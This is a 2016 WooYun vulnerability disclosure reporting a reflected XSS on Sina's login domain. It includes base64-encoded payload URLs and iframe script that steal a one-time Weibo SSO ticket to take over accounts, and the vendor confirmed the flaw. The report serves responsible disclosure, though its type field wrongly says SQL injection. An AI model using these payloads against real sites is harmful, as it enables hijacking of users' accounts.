当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0189664

漏洞标题:新浪微博之点击我的链接就登录你的微博(XSS敏感域)

相关厂商:新浪微博

漏洞作者: loopx9

提交时间:2016-03-27 18:34

修复时间:2016-05-12 12:39

公开时间:2016-05-12 12:39

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-27: 细节已通知厂商并且等待厂商处理中
2016-03-28: 厂商已经确认,细节仅向厂商公开
2016-04-07: 细节向核心白帽子及相关领域专家公开
2016-04-17: 细节向普通白帽子公开
2016-04-27: 细节向实习白帽子公开
2016-05-12: 细节向公众公开

简要描述:

反射xss一枚.

详细说明:

一处反射型xss,用户名为base64编码, 没有过滤.

http://login.sina.com.cn/sso/login.php?su=ZnNkZnNkZicvPg0KPHNjcmlwdD4NCmFsZXJ0KC94c3MvKTsNCjwvc2NyaXB0Pjwn&sp=&encoding=UTF-8&returntype=META

1.png


因为是login.sina.com.cn下的xss,可以进一步利用。
微博单点登录获取ticket url:

http://login.sina.com.cn/sso/login.php?url=http%3A%2F%2Fweibo.com%2F&gateway=1&service=miniblog&entry=miniblog&useticket=1&returntype=META&_client_version=0.6.14

2.png

http://passport.weibo.com/wbsso/login?url=http%3A%2F%2Fweibo.com%2F&ticket=ST-*****-1459053552-xd-5025***98696******922F1*30E&retcode=0


经测试ticket是一次性的,没有绑定浏览器UA、客户端IP,所以只要获取到这条url,就能登录对应的微博账户了。
payload构造如下:

redirect=null;
document.body.innerHTML="<iframe id=\"xxoo\" sandbox=\"allow-same-origin\" src=\"http://login.sina.com.cn/sso/login.php?url=http://weibo.com/&gateway=1&service=miniblog&entry=miniblog&useticket=1&returntype=META&_client_version=0.6.14\" onload=\"alert(document.getElementById('xxoo').contentWindow.document.body.innerHTML)\" width=\"0\" height=\"0\"/>";

redirect=null;重写redirect函数防止页面跳转。挂一个iframe,利用html5中iframe的sandbox属性,不执行iframe里边的js代码,而后onload事件获取iframe窗体内容,从而得到未使用的ticket。
构造好的url如下:

http://login.sina.com.cn/sso/login.php?su=ZnNkZnNkZicvPg0KPHNjcmlwdD4NCnJlZGlyZWN0PW51bGw7DQpkb2N1bWVudC5ib2R5LmlubmVySFRNTD0iPGlmcmFtZSBpZD1cInh4b29cIiBzYW5kYm94PVwiYWxsb3ctc2FtZS1vcmlnaW5cIiBzcmM9XCJodHRwOi8vbG9naW4uc2luYS5jb20uY24vc3NvL2xvZ2luLnBocD91cmw9aHR0cCUzQSUyRiUyRndlaWJvLmNvbSUyRiZnYXRld2F5PTEmc2VydmljZT1taW5pYmxvZyZlbnRyeT1taW5pYmxvZyZ1c2V0aWNrZXQ9MSZyZXR1cm50eXBlPU1FVEEmX2NsaWVudF92ZXJzaW9uPTAuNi4xNFwiIG9ubG9hZD1cImFsZXJ0KGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCd4eG9vJykuY29udGVudFdpbmRvdy5kb2N1bWVudC5ib2R5LmlubmVySFRNTClcIiB3aWR0aD1cIjBcIiBoZWlnaHQ9XCIwXCIvPiI7DQo8L3NjcmlwdD48Jw==&sp=&encoding=UTF-8&returntype=META

漏洞证明:

本地测试弹窗:

3.png


将窗体内容发送至cloudeye:

4.png


5.png


期间叫一个白帽子测试了一下,使用cloudeye记录的url成功登录他的微博。

6.png

修复方案:

.

版权声明:转载请注明来源 loopx9@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-03-28 12:39

厂商回复:

感谢关注新浪安全,问题修复中。

最新状态:

暂无